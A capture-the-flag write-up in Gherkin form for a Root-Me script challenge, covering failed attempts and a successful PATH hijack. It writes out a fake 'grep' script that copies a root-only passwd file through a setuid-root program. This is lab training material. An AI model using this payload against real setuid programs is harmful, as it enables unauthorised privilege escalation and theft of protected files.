## Version 2.0
## language: en

Feature: rootme-app-script-bash-awk-netstat-parsing
  Site:
    https://www.root-me.org
  Category:
    app-script
  User:
    andrescl94
  Goal:
    Exploit a vulnerable script to get the flag

  Background:
  Hacker's software:
  | <Software name>                | <Version> |
  | Ubuntu (Bionic)                | 18.04.1   |

  Machine information:
    Given the challenge SSH credentials
    """
    host: ctf03.root-me.org
    port: 22
    user: user
    pass: password
    """
    Then I am able to successfully log in to the remote server

  Scenario: Fail: Shared-Libraries
    Given that I am connected to the server through SSH
    And the challenge prompts to exploit the script under
    """
    /srv/sync_backlog
    """
    When I go to the folder of interest I find the following files
    """
    -rwsr-xr-x 1 root root 8536 Oct 21  2017 check_syn_backlog
    -rw-r--r-- 1 root root  180 Oct 21  2017 check_syn_backlog.c
    -rwxr-xr-x 1 root root 2556 Oct 28  2017 check_syn_backlog.sh
    -r-------- 1 root root   37 Oct 11  2017 passwd
    """
    And I notice that the "passwd" file can only be read by the user "root"
    And that the "check_syn_backlog" program is executed as "root"
    Then I realize I have to use that program as the entrypoint
    When I list the dynamic libraries associated with the program
    """
    ldd check_syn_backlog
    """
    Then I get these results
    """
    linux-vdso.so.1 (0x00007ffe3a740000)
    libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007ffbef1f6000)
    /lib64/ld-linux-x86-64.so.2 (0x00007ffbef795000)
    """
    And I cannot find any way to edit the files to my advantage
    And I do not find the flag

  Scenario: Fail: Networking
    Given that the script of interest is "check_syn_backlog"
    When I read the source code in C
    Then I realize that the program just calls the script "check_syn_backlog.sh"
    And I move on to reading the code in that script
    And notice that it uses "netstat" to keep track of network connections
    And parses the output to get information on the process
    When I use Python to create a listening socket
    Then I can see it in the output of netstat
    """
    Proto  Recv-Q  Send-Q  Local Address  Foreign Address  State   PID/Program
    tcp        0      0    0.0.0.0:22     0.0.0.0:*        LISTEN  -
    tcp        0      0    0.0.0.0:4444   0.0.0.0:*        LISTEN  984/python
    tcp6       0      0    :::22          :::*             LISTEN  -
    """
    When I run the program
    Then it kills my Python process
    And I do not get the flag

  Scenario: Success: Custom-Grep-Command
    Given that I am looking for a way to exploit the Bash script
    Then I decide to run it with the "PATH" variable unset
    And I get the following output
    """
    Let's grab all the TCP networking processes' names and try to resolve
    the local IP address of those with a full syn backlog.

    /bin/egrep: 2: exec: grep: not found
    netstat returns an error
    Cleaning up the environment.
    """
    And I think of creating a custom definition of "grep"
    When I create a grep script containing the following lines of code
    """
    #!/bin/sh
    /bin/cat /srv/syn_backlog/passwd > /home/user/passwd
    /bin/chown user:user /home/user/passwd
    """
    And I set the "PATH" to the home directory
    And I execute the program one more time
    Then I see the file was created in the home directory
    And I get the flag
